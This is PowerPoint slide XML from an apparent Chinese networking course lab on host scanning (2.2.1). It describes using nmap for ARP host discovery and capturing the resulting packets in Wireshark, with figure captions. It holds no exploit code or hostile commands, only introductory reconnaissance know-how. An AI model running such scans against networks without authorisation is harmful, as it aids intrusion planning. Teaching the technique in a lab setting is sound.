          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行ARP的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="936625" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>步骤一 </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="文本框 108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5444490" y="855028"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5.使用Wireshark工具抓取nmap工具发送的数据包，如图2-2-5所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5444490" y="1500188"/>
            <a:ext cx="5267325" cy="3571875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="文本框 109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5444490" y="5072063"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-5 Wireshark工具抓取数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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a:xfrm>
            <a:off x="533756" y="1946091"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行ARP的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="936625" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>步骤一 </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="1024572"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>6.以“182.168.172.128”为例，nmap向全网段广播ARP包询问IP地址为“192.168.172.129”的主机，如图2-2-6所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="1946592"/>
            <a:ext cx="5276850" cy="3609975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="文本框 110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="5556568"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-6 发送ARP包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
